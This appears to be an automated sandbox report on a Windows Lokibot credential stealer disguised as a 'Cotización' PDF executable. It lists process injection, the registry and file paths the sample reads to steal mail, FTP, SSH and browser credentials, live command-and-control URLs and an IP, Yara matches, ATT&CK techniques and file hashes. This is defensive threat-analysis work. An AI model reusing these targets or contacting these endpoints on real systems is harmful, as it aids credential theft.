              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe TID: 2224Thread sleep time: -780000s >= -30000s
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeCode function: 0_2_00405D7C FindFirstFileA,FindClose,
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeCode function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeCode function: 0_2_00402630 FindFirstFileA,
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeCode function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeThread delayed: delay time: 60000
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeAPI call chain: ExitProcess graph end node
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeAPI call chain: ExitProcess graph end node
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeCode function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeCode function: 1_2_00402B7C GetProcessHeap,RtlAllocateHeap,
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeCode function: 0_2_0019EA4E mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeCode function: 0_2_0019E83A mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeCode function: 0_2_0019EB7C mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeCode function: 0_2_0019EAFF mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeCode function: 0_2_0019EB3E mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeCode function: 1_2_0040317B mov eax, dword ptr fs:[00000030h]

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              Injects a PE file into a foreign processesShow sources
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeMemory written: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeProcess created: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe "C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe"
              Source: Cotizaci#U00f3npdf.exe, 00000001.00000002.507208708.0000000000DB0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
              Source: Cotizaci#U00f3npdf.exe, 00000001.00000002.507208708.0000000000DB0000.00000002.00020000.sdmpBinary or memory string: Progman
              Source: Cotizaci#U00f3npdf.exe, 00000001.00000002.507208708.0000000000DB0000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
              Source: Cotizaci#U00f3npdf.exe, 00000001.00000002.507208708.0000000000DB0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
              Source: Cotizaci#U00f3npdf.exe, 00000001.00000002.507208708.0000000000DB0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeCode function: 0_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeCode function: 1_2_00406069 GetUserNameW,

              Stealing of Sensitive Information:

              barindex
              Yara detected LokibotShow sources
              Source: Yara matchFile source: 00000001.00000002.506971485.0000000000728000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.446107711.0000000000745000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 1.0.Cotizaci#U00f3npdf.exe.400000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Cotizaci#U00f3npdf.exe.400000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Cotizaci#U00f3npdf.exe.400000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Cotizaci#U00f3npdf.exe.400000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Cotizaci#U00f3npdf.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Cotizaci#U00f3npdf.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Cotizaci#U00f3npdf.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Cotizaci#U00f3npdf.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Cotizaci#U00f3npdf.exe.3040000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.1.Cotizaci#U00f3npdf.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Cotizaci#U00f3npdf.exe.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Cotizaci#U00f3npdf.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.1.Cotizaci#U00f3npdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Cotizaci#U00f3npdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Cotizaci#U00f3npdf.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000000.247742577.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.244286922.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000001.249037947.0000000000400000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.246598444.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.245329256.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.250602382.0000000003040000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Cotizaci#U00f3npdf.exe PID: 2604, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Cotizaci#U00f3npdf.exe PID: 2512, type: MEMORYSTR
              Tries to steal Mail credentials (via file / registry access)Show sources
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
              Tries to harvest and steal ftp login credentialsShow sources
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
              Tries to steal Mail credentials (via file registry)Show sources
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeCode function: PopPassword
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeCode function: SmtpPassword
              Tries to harvest and steal browser information (history, passwords, etc)Show sources
              Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: Yara matchFile source: 1.0.Cotizaci#U00f3npdf.exe.400000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Cotizaci#U00f3npdf.exe.400000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Cotizaci#U00f3npdf.exe.400000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Cotizaci#U00f3npdf.exe.400000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Cotizaci#U00f3npdf.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Cotizaci#U00f3npdf.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Cotizaci#U00f3npdf.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Cotizaci#U00f3npdf.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Cotizaci#U00f3npdf.exe.3040000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.1.Cotizaci#U00f3npdf.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Cotizaci#U00f3npdf.exe.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Cotizaci#U00f3npdf.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.1.Cotizaci#U00f3npdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Cotizaci#U00f3npdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Cotizaci#U00f3npdf.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000000.247742577.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.244286922.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000001.249037947.0000000000400000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.246598444.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.245329256.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.250602382.0000000003040000.00000004.00000001.sdmp, type: MEMORY

              Remote Access Functionality:

              barindex
              Yara detected LokibotShow sources
              Source: Yara matchFile source: 00000001.00000002.506971485.0000000000728000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.446107711.0000000000745000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 1.0.Cotizaci#U00f3npdf.exe.400000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Cotizaci#U00f3npdf.exe.400000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Cotizaci#U00f3npdf.exe.400000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Cotizaci#U00f3npdf.exe.400000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Cotizaci#U00f3npdf.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Cotizaci#U00f3npdf.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Cotizaci#U00f3npdf.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Cotizaci#U00f3npdf.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Cotizaci#U00f3npdf.exe.3040000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.1.Cotizaci#U00f3npdf.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Cotizaci#U00f3npdf.exe.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Cotizaci#U00f3npdf.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.1.Cotizaci#U00f3npdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Cotizaci#U00f3npdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Cotizaci#U00f3npdf.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000000.247742577.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.244286922.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000001.249037947.0000000000400000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.246598444.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.245329256.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.250602382.0000000003040000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Cotizaci#U00f3npdf.exe PID: 2604, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Cotizaci#U00f3npdf.exe PID: 2512, type: MEMORYSTR

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsNative API1Path InterceptionAccess Token Manipulation1Deobfuscate/Decode Files or Information1OS Credential Dumping2Account Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
              Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection112Obfuscated Files or Information2Credentials in Registry2File and Directory Discovery2Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Software Packing1Security Account ManagerSystem Information Discovery5SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Masquerading11NTDSQuery Registry1Distributed Component Object ModelClipboard Data1Scheduled TransferApplication Layer Protocol113SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion11LSA SecretsSecurity Software Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonAccess Token Manipulation1Cached Domain CredentialsProcess Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncVirtualization/Sandbox Evasion11Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Owner/User Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

              Behavior Graph

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Cotizaci#U00f3npdf.exe25%VirustotalBrowse
              Cotizaci#U00f3npdf.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              1.0.Cotizaci#U00f3npdf.exe.400000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              1.0.Cotizaci#U00f3npdf.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              1.1.Cotizaci#U00f3npdf.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              1.0.Cotizaci#U00f3npdf.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              1.0.Cotizaci#U00f3npdf.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              1.0.Cotizaci#U00f3npdf.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              1.0.Cotizaci#U00f3npdf.exe.400000.0.unpack100%AviraTR/Patched.Ren.Gen2Download File
              0.2.Cotizaci#U00f3npdf.exe.3040000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              1.2.Cotizaci#U00f3npdf.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              1.0.Cotizaci#U00f3npdf.exe.400000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File

              Domains

              SourceDetectionScannerLabelLink
              slimpackage.com8%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
              http://alphastand.win/alien/fre.php0%URL Reputationsafe
              http://alphastand.trade/alien/fre.php0%URL Reputationsafe
              http://alphastand.top/alien/fre.php0%URL Reputationsafe
              http://www.ibsensoftware.com/0%URL Reputationsafe
              http://slimpackage.com/slimmain/five/fre.php9%VirustotalBrowse
              http://slimpackage.com/slimmain/five/fre.php100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              slimpackage.com
              104.223.93.105
              truetrueunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://kbfvzoboss.bid/alien/fre.phptrue
              • URL Reputation: safe
              unknown
              http://alphastand.win/alien/fre.phptrue
              • URL Reputation: safe
              unknown
              http://alphastand.trade/alien/fre.phptrue
              • URL Reputation: safe
              unknown
              http://alphastand.top/alien/fre.phptrue
              • URL Reputation: safe
              unknown
              http://slimpackage.com/slimmain/five/fre.phptrue
              • 9%, Virustotal, Browse
              • Avira URL Cloud: malware
              unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://nsis.sf.net/NSIS_ErrorCotizaci#U00f3npdf.exefalse
                high
                http://nsis.sf.net/NSIS_ErrorErrorCotizaci#U00f3npdf.exefalse
                  high
                  http://www.ibsensoftware.com/Cotizaci#U00f3npdf.exe, Cotizaci#U00f3npdf.exe, 00000001.00000000.244286922.0000000000400000.00000040.00000001.sdmp, Cotizaci#U00f3npdf.exe, 00000001.00000001.249037947.0000000000400000.00000040.00020000.sdmpfalse
                  • URL Reputation: safe
                  unknown

                  Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public

                  IPDomainCountryFlagASNASN NameMalicious
                  104.223.93.105
                  slimpackage.comUnited States
                  8100ASN-QUADRANET-GLOBALUStrue

                  Private

                  IP
                  192.168.2.1

                  General Information

                  Joe Sandbox Version:34.0.0 Boulder Opal
                  Analysis ID:553335
                  Start date:14.01.2022
                  Start time:17:27:10
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 5m 45s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:Cotizaci#U00f3npdf.exe
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:24
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@3/6@59/2
                  EGA Information:
                  • Successful, ratio: 100%
                  HDC Information:
                  • Successful, ratio: 73% (good quality ratio 70.3%)
                  • Quality average: 79%
                  • Quality standard deviation: 27.8%
                  HCA Information:
                  • Successful, ratio: 88%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .exe
                  Warnings:
                  Show All
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                  • HTTP Packets have been reduced
                  • TCP Packets have been reduced to 100
                  • Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200
                  • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, www.bing.com, dual-a-0001.dc-msedge.net, fs.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  17:28:16API Interceptor56x Sleep call for process: Cotizaci#U00f3npdf.exe modified

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASN

                  No context

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Temp\nsc114F.tmp
                  Process:C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):250917
                  Entropy (8bit):7.742545601504465
                  Encrypted:false
                  SSDEEP:6144:YhLBgpumJXJnGuUAN+eNkzPqEUvqhfKuLYq:gunJXJGbxGEUvAK1q
                  MD5:5DFC9959804DDC0C5314ECD87BA862FC
                  SHA1:3446B84156E3A47134F92557A40E630762E025F9
                  SHA-256:49277821695C781495E081F33A5DFB31295256619BB0B472498108F9F912A1ED
                  SHA-512:731A82DDD6036ED1C5E34C487F2FD0FF74B192300906E742BE4FC8CF785CEA8A8B5C965BD526F1DDBD6587C15BA686D98CCA8ED33E766C490B62E9D2175FC373
                  Malicious:false
                  Reputation:low
                  Preview: .]......,...................(...<F.......\......s]..........................................................................................................................................................................................................................................J...............Y...j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Temp\nsc1150.tmp\tjbqk.dll
                  Process:C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe
                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):3.8339776551191647
                  Encrypted:false
                  SSDEEP:24:e1GSb0JDlXEcQA3ax/+XIfG7xkFsQZo+NTyYX73rNTytk8q6I1HPnRuV4MPgics:SgZyhQ4fG7xwbT9f6IvRuqSt
                  MD5:EED28D9A6DF23D102EB1E7DB08E9B8A8
                  SHA1:B1EA3474DA51812F436C0D65178AAEE00C916628
                  SHA-256:2107EF7267EAD9ADD2CBD586F121A505DCC92DB08F9E61D6E2CCCA056D4DEED5
                  SHA-512:8B133190AF32CF0B5C0C5E1B93D84C3AE1A9494EBD0419CD911784804E74232FA15AD4F6D787E897AF05E90DD2801772C03DEA1282DED7921AF25EB0FBE353AB
                  Malicious:false
                  Reputation:low
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........U.CU.CU.C...CT.C0..BZ.CU.Cw.C..BT.C..BT.C.QCT.C..BT.CRichU.C........PE..L......a...........!......................... ...............................P............@.......................... ..H.... .......0.......................@..L.................................................... ...............................text............................... ..`.rdata..f.... ......................@..@.rsrc........0......................@..@.reloc..L....@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Temp\p6r1xk6jk0bjdf9059l3
                  Process:C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):217882
                  Entropy (8bit):7.989727494503245
                  Encrypted:false
                  SSDEEP:6144:dLBgpumJXJnGuUAN+eNkzPqEUvqhfKuLYq3:xunJXJGbxGEUvAK1q3
                  MD5:6D5DAFE120D6D1DD61199A4F38F20619
                  SHA1:493D1BD761B2E417FDFF7C1BFC3D68CCAB01460B
                  SHA-256:378B7FE283382B7E1F0E67C41C4CAA451B6AB44E546796BA622692224E67C9A9
